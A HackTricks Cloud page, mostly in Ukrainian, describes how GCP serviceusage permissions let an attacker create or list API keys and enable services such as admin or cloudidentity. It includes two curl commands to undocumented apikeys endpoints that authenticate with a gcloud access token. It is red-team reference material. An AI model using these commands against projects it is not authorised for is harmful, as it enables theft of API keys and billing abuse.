GCP - Serviceusage Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

serviceusage

Наступні дозволи корисні для створення та викрадення API ключів, зверніть увагу на це з документації: API ключ — це простий зашифрований рядок, який ідентифікує додаток без будь-якого принципала. Вони корисні для доступу до публічних даних анонімно і використовуються для асоціювання API запитів з вашим проектом для квоти та білінгу.

Отже, з API ключем ви можете змусити цю компанію платити за ваше використання API, але ви не зможете підвищити привілеї.

Щоб дізнатися про інші дозволи та способи генерації API ключів, перегляньте:

GCP - Apikeys Privesc

`serviceusage.apiKeys.create`

Був знайдений не задокументований API, який можна використовувати для створення API ключів:

curl -XPOST "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"

`serviceusage.apiKeys.list`

Було знайдено ще один не задокументований API для переліку API ключів, які вже були створені (API ключі з'являються у відповіді):

curl "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"

`serviceusage.services.enable` , `serviceusage.services.use`

З цими дозволами зловмисник може активувати та використовувати нові сервіси в проекті. Це може дозволити зловмиснику активувати сервіси, такі як admin або cloudidentity, щоб спробувати отримати доступ до інформації Workspace або інших сервісів для доступу до цікавих даних.

References

https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/

Support HackTricks and get benefits!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!

Discover The PEASS Family, our collection of exclusive NFTs

Get the official PEASS & HackTricks swag

Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.

Share your hacking tricks submitting PRs to the hacktricks github repo****

PreviousGCP - Secretmanager Privesc NextGCP - Sourcerepos Privesc

Last updated 1 month ago